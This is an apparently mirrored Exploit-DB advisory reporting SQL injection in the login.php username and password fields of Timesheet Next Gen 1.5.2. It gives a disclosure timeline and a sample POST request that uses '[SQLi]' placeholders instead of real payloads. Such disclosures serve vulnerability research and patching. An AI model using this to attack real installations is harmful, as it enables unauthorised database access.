Timesheet Next Gen 1.5.2 – Multiple SQL Injections

• Exploit Database
• 28 阅读

• 作者： G13
  日期： 2012-03-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18554/

• # Exploit Title: Timesheet Next Gen 1.5.2 Multiple SQLi
  # Date: 02/23/12
  # Author: G13
  # Software Link: https://sourceforge.net/projects/tsheetx/
  # Version: 1.5.2
  # Category: webapps (php)
  #
  
  ##### Vulnerability #####
  
  The login.php page has multiple SQL injection vulnerabilities. Both
  the 'username' and 'password'
  parameters are vulnerable to SQL Injection.
  
  The vulnerability exists via the POST method.
  
  ##### Vendor Notification #####
  
  02/23/12 - Vendor Notified
  02/26/12 - Email sent to each developer, developer responds
  02/29/12 - Confirmation by developer requested
  03/02/12 - Disclosure
  
  ##### Exploit #####
  
  http://localhost/timesheet/
  
  POST /timesheet/login.php HTTP/1.1
  Host: localhost
  User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:10.0.2)
  Gecko/20100101 Firefox/10.0.2
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip, deflate
  Connection: keep-alive
  Referer: http://localhost/timesheet/login.php
  Cookie: PHPSESSID=3b624f789e37fa3bdade432da
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 52
  redirect=&username=[SQLi]&password=[SQLi]&Login=submit